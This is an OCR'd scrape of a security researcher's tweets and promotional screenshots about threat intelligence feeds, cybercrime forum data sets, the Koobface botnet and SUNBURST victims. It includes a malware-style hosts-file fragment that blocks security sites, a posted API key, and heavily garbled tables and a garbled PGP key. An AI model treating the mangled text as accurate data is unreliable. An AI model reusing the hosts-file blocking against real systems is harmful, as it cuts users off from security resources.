@rickhholland | have another perspective and it works - https://t.co/3UzZ7SeRhSI two 
models here - "everything that has already been seen is already there" meaning you 
just have to connect the dots and "Google is your best friend" #CTISummit 


*1 
08:30 


@rickhholland Good point. The bad guys are also sometimes "lazy". Here are some 
380 


slides on attribution and OPSEC failures by the bad guys here - 
https://t.co/QWTfUhDxyC and hey this is 2007. #CTISummit 


21 *%2 
08:33 
@rickhholland Could data sets collected in real time or periodic basis do the magic? 


https://t.co/rgsEandTx7 you bet! Here are some findings based on data mining my 
own data set - https://t.co/RVOQQwEwwg #CTISummit 


08:38 


@rickhholland Think big. Forget about everyone. Go public with as much details as 
possible. Then pop up at a security event or a conference and take the blame for 
having everyone greeting you and saying "hi" Here’s an example - 
https://t.co/VAngqQkjJd #CTISummit 


08:40 


@rickhholland @cybereason You’re the team and then the whole team becomes one. 
What everyone on your team should consider and act like a one man operation while 
the whole team or you in particular would take the "blame" and all the credit for all 
the hard work. #CTISummit 


*1 


28 - Friday 


00:57 


A podcast with me for my employer @whoisxmlapi where I’m acting as a DNS Threat 
Researcher since January, 2021 - https://t.co/MDkvbEPrT6 Enjoy! #security 
#cybercrime #malware #CyberAttack #cyberattacks #CyberSec #ThreatiIntel 
#Threatintelligence 


29 - Saturday 


07:49 


@Treadstone71LLC Jeffrey. | just send you an email. Ping me back when you read it. 
Regards. Dancho (https://t.co/JTcqOaYgET) 


11:08 


Folks. This is Dancho (https://t.co/JTcqOaYgET). Who wants to obtain free access to 
my 96GB Cybercrime Forum Data Set for 2021 part of my Law Enforcement and 
OSINT Operation "Uncle George" - https://t.co/RVOQQwEwwg drop me a line at 

dancho.danchev@hush.com https://t.co/2h02KLyj2p 


Cybercrime Forum 
Data Set 2021 


FULL OFFLINE COPIES OF OVER 11) PUBLICLY 
ACCESSIBLE FORUM 
COMMUNITIES! LET'S SET THEM 


dancho danchevivhaah rom 


February 


1 - Tuesday 


01:36 


Check out my latest research for @whoisxmlapi on the InFraud Organization bust - 
https://t.co/mGFQOGBB4Y #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cybersecuritytips #ThreatIintelligence #threatreport 
03:13 


The InFraud Organization. Check out the slides here - https://t.co/QWTfUhDxyC and 
hey it’s 2007! CC: @ProjectHoneynet and here are the technical details - 
https://t.co/9IWM9nHOZH Cheers! #security #ThreatHunting #Threatintelligence 
#threatreport 
22 2 
03:55 


Check out this @MaltegoHQ tutorial on the recent InFraud organization bust - 
https://t.co/jQkJq5Y800 including all the technical details. This is a video courtesy of 
me for @whoisxmlapi stay tuned for more! The details - https://t.co/9IWM9nHOZH 


23 4 


3 - Thursday 


00:05 


Check out this @MaltegoHQ OSINT tutorial - https://t.co/s3EVCIZTkK courtesy of me 
for @whoisxmlapi where | do cyber threat actor infrastructure mapping using Maltego 


382 


on FBI’s Most Wanted - SecondEye Solutions company. Enjoy! #Threatintelligence 
#OSINT 


*1 


4 - Friday 


05:37 


https://t.co/YvxKO3WTUw #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintel #Threatintelligence https://t.co/ICcmu8QNlv 


22 %3 


People OSINT Attribution Techniques 


How can OSINT be applied to People Cyber Attack Attribution Techniques? 


What are the most popular and recommended OSINT techniques for doing people attribution to cyber attack 
campaigns? 


15:57 


Who is Dancho Danchev? - https://t.co/dcUrKPM6hz #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence #threatreport 
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5 - Saturday 


10:39 


Grab the torrent! For free! Enter the bold new world of data mining hundreds of 
publicly accessible cybercrime-friendly forum communities and improve your 
situational awareness in the world of cybercrime fighting - https://t.co/KOOtL33ynk 
[torrent] https://t.co/Mal5800YPk 
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<parent> Darkmoney iHonker ShadowMarket 


11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigF ozzy Free-hack pay-per-install.org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


10:40 


Here’s a compilation of all of my publicly accessible research in the form of a torrent. 
Grab a copy today! - https://t.co/zLxOBiAf]M [torrent] #security #cybercrime 
#malware #CyberSecurity #cybersecuritytips #Threatintel #ThreatHunting 

#threatintelligence 
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11:18 
@GregoryDEvans Thanks for the link! 


8 - Tuesday 


14:18 


Who's running their own MISP - Open Source Threat Intelligence Platform instance? 
Drop me a line at dancho.danchev@hush.com #security #cybercrime #malware 
#CyberSecurity #CyberAttack #Threatintel #ThreatHunting #Threatintelligence 


23 *4 
14:19 


Who wants to hook themselves to my MISP - Open Source Threat Intelligence 
Platform? Free API keys offered for consumption! Drop me a line at 
dancho.danchev@hush.com 
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*1 


9 - Wednesday 


04:28 


Who loves Threat Intelligence? https://t.co/8BBKUOX5FSx #security #cybercrime 
#malware #CyberAttack #CyberSecurity #cyberattacks #CyberSecurityAwareness 
#Threatintelligence #threatreport #MISP #Maltego #OSINT 


2 
04:33 
Retweet please! https://t.co/8BkKUOXmIUx #security #cybercrime #malware 


#CyberSecurity #CyberAttack #cyberattacks #CyberSecurityAwareness 
#Threatintelligence #threatreport #MISP #Maltego #OSINT 


05:47 


Ping me for API access here - https://t.co/8BKUOX5FSx #security #cybercrime 
#malware #CyberSecurity #CyberAttack #CyberSecurityAwareness 
#Threatintelligence #threatreport #MISP #Maltego #OSINT 


*2 
15:10 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatIntelligence #threathunting #threatreport #threatintel 


22 


15:48 


As of today I’m starting to post on Twitter on an hourly and daily basis in order to 
attract users that includes vendors and organizations for my #MISP instance. 
https://t.co/LErVobxSGp #Threatintelligence #threathunting #threatreport 
#threatintel 


2il 
15:54 
https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 


#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/DuzSIGrs71 


15:54 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/P1V3ISHEA7 


15:54 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/a55Xo030ZrA 


ete 


15:54 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/b3c2cdkLGI 


ete 


15:55 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
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Competitors 


® Identified Competitors + iDefense Labs (US) 
* Cyber Defense Agency (CDA) » JET Intelligent Risk Systems (US) 
(US) « Informatica (US) 
* Cyber Security Research and « IT-—Information Sharing and 
Development Center (US) Analysis Center (US) 
» Cyveillance (US) e iSIGHT Partners (US) 
* Dancho Danchev (EU) * Lookingglass (US) 


* Department of Homeland * Multi-State Information Sharing 
Security US-CERT(US) Analysis Center (US) 


* Ernst & Young (EU) « nCircle (US) 
* EWA Information and * SecureWorks (US) 
Infrastructure Technologies, Inc. * Trend Micro (US) 
(US) * United States Cyber 
* Fortify (US) Consequence Unit (US) 
* Global Security Mag (EU) 
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reoumary wereer fel ekilites Re 
Primary ip ediress 92 46.53.1890 


Last actified - 2011-03-09 11:55:26.0 
Somalia states = Gh - Mp state. 


Seqieter created, SKILLTEX 
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18:54 Oe @ - oo” 40 
€ Tweet 


t You Retweeted 

iW) NETRESEC 

LN @netresec 
Our #SUNBURST STAGE2 Victim 
Table (orgs actively targeted by the 
threat actor) has now been updated 
to include “paloaltonetworks*". 
The internal AD domain for GUID 
22334A7227544B1E was discovered 


in passive DNS data published by 
@dancho_danchev. 


oun avsymcioud.com Timestamp = AD Demaain 
Subdomain (utc) 
ZOGRAFELIESIO7AL —AntvteSqmor7/Mpeget 2020-05-30 


IOTIONIEN2CIO“NS «= PsbwerscsOrre 925000 2020-06-15 contial pima.gov 


FRORDON4TE 495629 «gq LneSéSeeggrssmacgn 2020-06-13 Cential pra gov 


PCOTE SOL OZSO MEL Gas Ta2nalomeeg15en9 2070-06-13 Central pina gov 


OBIOESESISTIAIF? = tvpqu@pweqQo?MoT7 et 2079-06-20 Coommet Com Com 


GARBAMEUDITIO = PudDoOrrecBhIessk 2020.07.02 


298332520820721 Lebeto7me ute sp 2020-07-18 
05.00 

3CI27 147876EGEAS «= kSceunseant7om3 2020-07-22 
170 

SCI2Z714787GESEAL «= idoscksacciPanw icp 2020-07-23 
imp 


BOIDSETCEADOTIOOA — SqTDEeatmnanhigse> 


ZIBMATZITSA4BIE «= SqngOsechpGuqinots 2020-09-29 Paloatoneaworks* 


Tweet your reply (o) 
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= team, s0 often called “Koobface Gang", expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

@ Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of 
course analyzing software under VM Ware: 

® Trend Micro (http://trendmicro.com), espedally personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes we've ever made; 

® Cisco for their 3rd nage be, our software in their annual “working groups awards"; 

*® Soren Siebert with h 

@ Hundreds of users whe a us loos. crash reports, and wish-lists. 


In fact, it was a really hard year, We've made many efforts to improve our software, Thanks to Facebook's security team - the guys made us 
move ahead, And we've moved, And will move. Improving their security system, 


By the way, we did not have a cent using Twitter's traffic. But many security issues tell the world we did. They are wrong. 

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data, And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it :) 


Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 
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C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 


protocol 
Retrieve commands and 
1 KOOBFACE zombie computers’ IP 
from C&C - 
KOOBFACE C&C 4 — ca 
Retrieve commands from C&C G 
kde pont — 

ach and 

3 components using zombies” 

——~ as proxy 

Affected User Aeon nee 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. Afier several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry, the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware’s domain activities 
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14:29 . ie | 


February 15, 2011 


SC Social Media 
Awards 


Best Security Blogger: Graham Cluley, senior 
technology consultant at Sophos, for the Naked 


Security Blog 


Best Corporate Security Blog: Trend Micro’s 
TrendLabs Malware Blog 


Five to Follow on Twitter: 


¢ @cyberwar and @stiennon (Richard Stennon, 
chief research analyst of IT-Harvest) 

¢ @George KurtzCTO (George Kurtz, worldwide 
CTO of McAfee) 

e @danchodanchev (Dancho Danchev, 
independent security consultant) 

¢ @jeremiahg Jeremiah Grossman, founder 
and CTO of WhiteHat Security) 

© @owasp (the Open Web Application Security 
Project) 


NEXT POST IN EVENTS 


RSA Conference 2011: Terrorist organizations pose great« 
cyberthreat 
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hilary kneber @hilarykneber - Jan 16, 2011 v 
#DANCHO DANCHEV Does anyone know ..Is there a way I can determine 
the exact date that Dancho Danchev began to “unfollow" me? 
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14:29 2 & © + Moh 4g 
€- —_ Q Dancho Danchev Pe 


Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

~ Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 


- My old Twitter Account got 11,000 followers 

- [had an average of 7,000 RSS readers on my blog 

- [have my own vinyl “Blue Sabbath Black Cheer / Griefer - 
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista, box.sk 

- I gave an interview to DW on the Koobface Botnet 

- | gave an interview to NYTimes on the Koobface botnet 

- I gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s' 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 
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127.0.0.1 bobbear-.co-.uk 


127.0.0.1 reed.co.uk 
127.0.0.1 seek.com.au 
127.0.0.1 scam.com 
127.0.0.1 scambusters.org 


127.0.0.1 www.quardian.co-.uk 


127.0.0.1 ddanchev.blogspot-.com 


127.0.0.1 aic.gov.au 
127.0.0.1 google.com.au 
127.0.0.1 www.reed.co.uk 
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Feed Stats Dashboard Show stats for [alltime >| 
12000 1600 
9000 1200 
6000 800 
3000 400 
0 0 
2010 2015 
Wednesday, December 14, 2005 — Saturday, September 14, 2019 
+ 2,888 subscribers (on average) 8 
¢ 457 reach (on average) & 
See more about your subscribers » 
Popular Feed Items 
NAME VIEWS CLICKS 
Total 1,557,394 6,377,221 
Historical OSINT - Malicious Malvertising Campaig... 1463 71028 
Historical OSINT - Massive Black Hat SEO Campaign... 1397 70766 
Historical OSINT - Google Docs Hosted Rogue Chrom... 1402 70669 
See more about your feed items » 
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Table 9: Quality of selected a sources (10 out of 45) 


of 
noni robust 
iocterms 10Cs 


TuoSecurity 
Sucuri 
PaloAlto 
Malwarebytes 
Hexacorn 
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Targeted Client-Side Exploits Serving Campaigns 
Utilize the WebAttacker Web Malware Exploitation 
Kit 


Multiple Targeted MPack Client-Side Exploits 
Serving Campaigns Spotted in the Wild 


U.S Consulate St. Petersburg Serving Malware 


Fraudulent EBay Impersonating Phishing Campaign 
Spotted in the Wild 


Fraudulent PayPal Impersonating Phishing 
Campaign Spotted in the Wild 
Syrian Embassy in London Serving Malware 


Malicious Client-Side Exploits Serving Campaing 
Drops MMORPG Password Stealers 

Multiple Client-Side Exploits Serving Campaigns 
Utilize the n404 Exploit Kit 

Bank of India Web Site Compromised Leads to 
Client-Side Exploits and Malware 

Fraudulent Rock Phish Gang Phishing Campaign 
Spotted in the Wild 


Malicious Client-Side Exploits Serving Campaign 
Utilizes IcePack Web Malware Exploitation Kit for 
Fraudulent and Malicious Purposes 


World of Warcarf Phishing Campaign Spotted in the 
Wild 


Targeted Client-Side Exploits Serving Campaign 
Spotted in the Wild 


Targeted Client-Side Exploits Serving Campaign 
Spotted in the Wild 


Targeted MPack Client-Side Exploits Serving 
Campaign Spotted in the Wild 


Russian Business Network Mass iFrame Campaign 


Fake Adult Content Themed Web Sites Spreading 
Malicious Carpedi¢m Group Dialers Spotted in the 
Wild 
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Event Event Event 
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houda-taineaGrcomad com azerxca@pmal.com 


OsanaSenlaces! Ghotmad com 


rabh_atzubarGhotmai com 


fapot@gmai.com estalvesky@hotmai.com 
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Event Event Event 


sous ou@live.fr houds-takw s@hotmail.com 8zezaxxs@gmail.com 


I se @ 


= - Os ameBenLaden1@hotmail.com 


fay05@gmail.com estalvesky@hotmail.com 
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. 


@ Cyber Attribution WHOIS Registrant Email 
@ Cyber Jihad Domain 
@ Cyber Jihad Domain Responding IPs 


@ Cyber Jihad Intemet Infrastructure 


@ Cyber Terrorism Domain 


@ Cyber Terrorism | @ Cyber Terrorism Domain 


@ Cyber Terrorism Domain Responding IPs 
@ Cyber Terrorism Internet Infrastructure 


@ Cyber Jihaad [e Cyber Jihad Domain 


@ Cyber Jihad Domain Responding IPs 
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@ Botnet § @ Client-Side Exploits 


@ Drive By Download | @ Exploits @ TDS 
@ TDS (lraffic Distribution System) 


@ Traffic Distribution System | @ Vulnerabilities 


@ Botnet § @ Client-Side Exploits 
@ Drive By Download | @ Exploits § @ TDS 
@ TDS (lraffic Distribution System) 


@ Traffic Distribution System | @ Vulnerabilities 
@ Botnet § @ Client-Side Exploits 

@ Drive By Download | @ Exploits} @ TDS 

@ TDS (traffic Distribution System 


@ Traffic Distribution System | @ Vulnerabilities 


@ Botnet § @ DGA Botnet Command and Control 
@ DGA Botnet Command and Control Infrastructure 


@ Drive By Download | @ Fast Flux 
@ Fast Flux Botnet § @ Storm Worm Botnet 
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Attack PatternQ 
@ Buy domain name - T1328 Q:= 
@ Acquire and/or use 3rd party infrastructure services - T1329 Q:= 
@ Acquire and/or use 3rd party software services - T1330 Q:= 


Attack PatternQ 
@ Buy domain name - T1328 Q := 
@ Acquire and/or use 3rd party infrastructure services - T1329 Q:= 
@ Acquire and/or use 3rd party software services - T1330 Qi= 


Attack PatternQ 
@ Buy domain name - T1328 Q := 
@ Acquire and/or use 3rd party infrastructure services - T1329 Q:= 
@ Acquire and/or use 3rd party software services - T1330 Q:= 


12 - Saturday 
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Who needs a niche STIX STIX2 TAXII loCs (Indicator of Compromise) feed? Unique 
Threat Actors specific threat intelligence guaranteed. https://t.co/OmUajr8DT8 
#ThreatHunting #Threatintelligence #STIX #STIX2 #TAXII #IOC 
https://t.co/80S7j6kYmg 
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https://t.co/QbTOfuYY2p #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #ThreatHunting #Threatintelligence #STIX #STIX2 #TAXII #loC 


222 2 
15:55 
STIX/STIX2/TAXII Feed! - https://t.co/Bqbi2IDib5 Brochure - https://t.co/sEIhv2bb8t 


[PDF] #security #cybercrime #malware #CyberAttack #cyberattacks 
#ThreatHunting #Threatintelligence #threatintel #STIX #STIX2 #TAXII #loC 


23 2 
20:37 
Free STIX STIX2 TAXII feed for research! - https://t.co/OmUajr8DT8 Brochure - 


https://t.co/LZtRAVGOBe #security #cybercrime #malware #CyberAttack #CyberSec 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/B5LZ3QmU2G 
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13 - Sunday 


06:58 


If you believe in historical #OSINT and that data is everything in terms of "connecting 
the dots" in the world of cybercrime fighting - check out my STIX STIX2 and TAXII 
feed - https://t.co/OmUajr8DT8 Brochure - https://t.co/sElhv2bb8t [PDF] 
https://t.co/Gb5tGtaN2l 


407 


08:57 


15 years of STIX STIX2 TAXII compatible niche threat actor specific API feed! - 
https://t.co/OmUajr8DT8 Brochure - https://t.co/sElhv2bb8t #security #cybercrime 
#malware #ThreatHunting #Threatintelligence #threatintel RT pls! 
13:56 


https://t.co/KROkKbHSO3e #ThreatHunting #Threatintelligence #threatintel #STIX 
https://t.co/1I1rdiUKDeUA 
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16:09 


https://t.co/OmUajr8DT8 #ThreatHunting #Threatintel #Threatintelligence 
https://t.co/R2ZMxkKItZ 


14 - Monday 


20:07 


https://t.co/OmUajr8DT8 - free STIX STIX2 TAXII compatible threat actor specific 
threat intelligence feed for research purposes! 15 years of "connecting the dots" now 
in machine readable format! https://t.co/sElhv2bb8t #Threatintel #Threatintelligence 
https://t.co/g4eCRTaPHK 


21 %*1 


Need Niche Threat Actor 
Specific STIX/STIX2/TAXII 
Compatible loCs and Threat 


Intelligence Feed? 


x 


Threat Intelligence Feed Overview 


Ere} 


20:10 


https://t.co/OmUajr8DT8 - Brochure - https://t.co/sElhv2bb8t [PDF] #Security 
#cybercrime #Malware #infosec #informationsecurity #Threatintel 
#Threatintelligence #threatreport #OSINT #STIX #STIX2 #TAXII #OpencCTl 
https://t.co/WHCHPxoHgH 


23 *%5 
410 


15 - Tuesday 


12:18 


https://t.co/MuWtj6BBD9 #security #cybercrime #malware #cyberattacks 
#CyberAttack #cybernews #Threatintel #ThreatHunting #ThreatIntelligence 


17 - Thursday 


11:05 


Free Lifetime API Key - f8aaO0cca-a0ac-4eff-9c03-1c86ad7aee93 for my STIX STIX2 
TAXII feed - https://t.co/nmyFy5H3nvV start pulling today! TAXII Collection - 
https://t.co/VVVF5pIV60 For free! Lifetime! CC: @Anomali @LogRhythm 
@PaloAltoNtwks @TrendMicro https://t.co/4bU2zdsWdm 
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o 


AList Of Hezbollah Domains 


eo 


AList Of Cyber Jihad Domains 


Dancho Danchev 


13:42 
https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberSecurity 


#cyberattacks #ThreatHunting https://t.co/zyFgnd80Hb 


13:43 
https://t.co/nbH5pe9awi #security #cybercrime #malware #CyberSecurity 


#cyberattacks #ThreatHunting https://t.co/SlgvbQyRoQ 
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18 - Friday 


18:12 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #cyberattacks 
#CyberAttack #cyberthreats #CybersecurityNews #Threatintel #Threatintelligence 
#ThreatHunting #threatresearch #threatreport #STIX #STIX2 #TAXII 
https://t.co/jcnzSYBBW1 
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18:19 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/CaqlTdVAu7 
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18:19 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/iAP4enZvFF 
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STIX2 Attack Pattern 


STIX2 Campaign 


4 Campaign is 8 grouping of adversary behavior that desc 


STIX2 Course Of Action 


A Course of Action is an action taken either to prevent an attack or to respond 
STIX2 Grouping 


A Grouping object explicsl, 


STIX2 Identity 


entities can represent actual individuals, org 


STIX2 Incident 


The incident object in S 


STIX2 Indicator 
indicators contain a pattern that can b 
STIX2 Infrastructure 


infrastructure obj 


STIX2 Intrusion Set 


An nirusen Sets a 


STIX2 Location 


A Location represents a geographic location 


STIX2 Malware Analysis 


Malware Analysis captures the metad: 


STIX2 Malware 
‘ TIP t 


Malware is a type of hat is also known 


STIX2 Note 


A Note is a comment or note con 


STIX2 Observed Data 


bserved data conveys information that was observed on systems and 


STIX2 Opinion 


An Opinion is an as 


STIX2 Report 


Reports are collections of 


a STIX2 Threat Actor 


hreat Actors are actual individuals, group 


18:19 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/3BN1sEfcva 


Q.86K » 9° ators 


18:20 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
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#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/VuDGKAOpGx 


18:20 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/IJTFskai4T 
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19 - Saturday 


15:46 


Who pulled my STIX STIX2 TAXII feed already? - https://t.co/58vnX3ZjdH did you 
"connect the dots"? Stay tuned for massive volume of daily updates and consider 


416 


embedding it in your #Threatintelligence solution or firewall software. 


15:54 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/mQ8guFpxoQ 


Sample Logo of Dancho Danchev’s OpenCT! STIX2/TAXII Maltego Transforms Compatible OpencT! 


Instance Processing Hundreds of Never Published and Discussed Before Cybercrime Incidents and Threat 


Intelligence Events 


15:54 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/o4YdYDbFwM 
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@ Malware 

@ Cyber Jihad 

@ Cyber Terrorism 
@® Threat Actors 

@ Phishing 

@ Spam 

@ iM malware 

@ Mobile malware 


@ Mac OS X malware 


15:55 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/sjgdq99RJ3 
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Approach us Today and Begin Using Our Repository 
of Information! 


Dancho Danchev - “We Make Cyber Intelligence Impact 


Where No One Has Been Before” 


Web Site: https://ddanchev_blogspot.com 
Email: dancho.danchev@hush.com - inquire Today About Your AP! Key! 


PGP Key 


--—-BEGIN PGP PUBLIC KEY BLOCK----- 


MQGNBGG8zswBDADE2T GSJ/Vu8L 19t7 NKDJPIvnkWLegARdQkCfoOxvcUI64gVatl 
yODBjIVqHsokS5yilwK pwdd8VTISXGFG4rikJZURVX07 GbuzdDqBHNjT 3BoZgkE+u 
Emy1qskssiF VE+XzJdb5eaObH34cF ejbylL McRKh70iTVMz1nEQHGoXjk6GMKUss 
CniX+e4PxOML y6QCITT MzF 9SxxtORtul7 ypwZFMNFS+gOXpOyKNgQfaskvim6ZC 
FR jFinxQS8bzsbc47G87 Bqxwk7 HVNwOZrad4VIAICOVT VxoF SwoCdmvJbUcAuna 
vPTD+tkJIIGWRM+m96B8g4KLFECPwgk6j+INgju1 Is9F aeWNbvPHOAKO2mJDUL8u3 
OgpvXHnBB50YnnR6wPAUpKhK/BkQnp47kKHkFIOSNAGYO0eKNGGwjGLWRméiCVF6h 
7Evz7 QtFtsavNBiOSgOR70d+089e7F g3s3v1DSnsxMcT/wpiMAvdVMIg6VjENG45 
cWhrWO0OWEQFIEpcAEQEAAbDQoRGFuY 2hviIERNbmNoZXYgPGRhbmNoby5kYW5jaGV2 
QGh1c2guY29tPokBsAQTAQOAGgQLCQgHANUKANYBANKBBY JnvM7MAp4 
Dsp+ITgZoMAKqn4CyMk2g5nw7jsMpN7vnpHEulZgfj+cOM8+IT AASVK7HE 
+XH5ZY fwibvXH+g2qSn4918ACN4 iL dqvkhVBa84SZWISELrWPS6ugtzdRkW32Y/V 
Av/gP7)+y1K1X2Pmijh4iztfUpyo+iC+AVKZWmtMBtLL YoBvTEgyxRDvdAK5n3n2 
r8+1YOSUEJM+HfuBQgIhgAS5Ep/0 Tpotivan5q7iSdVcP9Znsmxc36CRIEauiYRGD 
BS56apcpwm SsplJnnjtig?z0jG8YwcOQ/T UBEM 1h7pH6KYT Zon/+{RsWFbbvFshabn 
0hz4ZtXyyTmnnGZACKoTzeAPdyGhKuT cEy TMuDJozrhrF7 fku+qherEWVYLr57jY 
DME3UbyzSywzRg8xJvR+T TNRQWWpOk3agDcamruEX9JQIPKPxabul+UHeSFZ0GGC 
Qy1y4mCkQEA6uT gLNq7gAMrGzn+0mKRMu31uxa05l+hamow2yLA2vZgMtnTaTLtc 
nAH42Kkep6+fPuYIFrkBjQRhvVM7MAQWAsbyF Tq38d2uapKjWEIwdS4+GizdDuyF J 
NFaSPe6v5dan0YaMOLjSYVqQN32uWA30ZCOriRgPWjI8+k39T CP836y5seL KSwat 
MxJdx4REHti0vV6KONp6dHHOT XytraHaxcvP'V97p+kn9E/XvLuc+J3HLXjSc66BZH 


15:55 
https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/jbHsYfr7hH 
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419 


- Malvertizing Campaigns and Incidents — Complete Qualitative and Incident and Campaign 
Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of loCs 
(Indicators of Compromise) and MD5s 


— The Koobface Botnet Monitored and Profiled — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


— Social Networking Sites Malware Campaigns and Incidents — Complete Qualitative and 
Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant 
Emails thousands of loCs (Indicators of Compromise) and MD5s 


— In-the-Wild Malware Analysis 

— Targeted Malware Analysis 

— Targeted Phishing Analysis 
— Malicious URL Analysis 

— Targeted Mobile Malware Analysis 
- APT Coverage 

— Fraudulent Infrastructure 
— Online Fraud Campaign 

— Historical OSINT Campaign 

— Russian Business Network coverage 

- Koobface Botnet coverage 

— Kneber Botnet coverage 
— Thousands of 1OCs (Indicators of Compromise) 
